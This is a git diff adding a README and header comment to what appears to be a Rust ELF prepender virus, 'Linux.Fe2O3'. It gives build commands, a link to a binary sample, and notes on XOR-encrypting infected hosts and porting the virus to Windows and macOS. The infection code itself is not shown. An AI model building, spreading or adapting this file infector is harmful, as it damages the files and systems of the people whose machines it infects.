diff --git a/README.md b/README.md index 7c223f9..8b72e54 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,24 @@ -# Fe2O3 -Simple prepender virus written in Rust +# Linux.Fe2O3 + +This is a POC ELF prepender written in Rust. I like writting prependers on languages that I'm learning and find interesting. + +# Build +```$ cd src +$ rustc main.rs -o Linux.Fe2O3 +``` + +Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment. + +# Binary Sample +A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 + +``` +$ file Linux.Fe2O3 +Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped + +$ sha1sum Linux.Fe2O3 +c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7 Linux.Fe2O3 +``` + +# Demo +[![asciicast](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc.png)](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc) diff --git a/src/main.rs b/src/main.rs index 4baf3b6..1fd5f5e 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,3 +1,26 @@ +/* + This is a ELF prepender written in Rust by TMZ (2019). + I like writting prependers on languages that I'm learning and find interesting. + + Linux.Fe2O3 (September 2019) - Simple binary infector written in Rust. + This version encrypts the host code with a simple XOR and decrypts it at runtime. + It's almost a direct port from my Nim infector Linux.Cephei and Go infector Linux.Liora. + + Build with: rustc main.rs -o Linux.Fe2O3 + + Note that Rust version used was rustc 1.37.0 (eae3437df 2019-08-13). + It has no external dependencies so it should compile under most systems (tested under x86_64). + It's also possible to adapt it to be a PE/Mach infector and compile under Windows/macOS. + + Use at your own risk, I'm not responsible for any damages that this may cause. + A big shout for those who keeps the scene alive! + + Feel free to email me: thomazi@linux.com || guilherme@guitmz.com + You can also find me at Twitter @TMZvx || @guitmz + + https://www.guitmz.com +*/ + use std::ffi::{OsStr, OsString}; use std::fs::File; use std::io::prelude::*;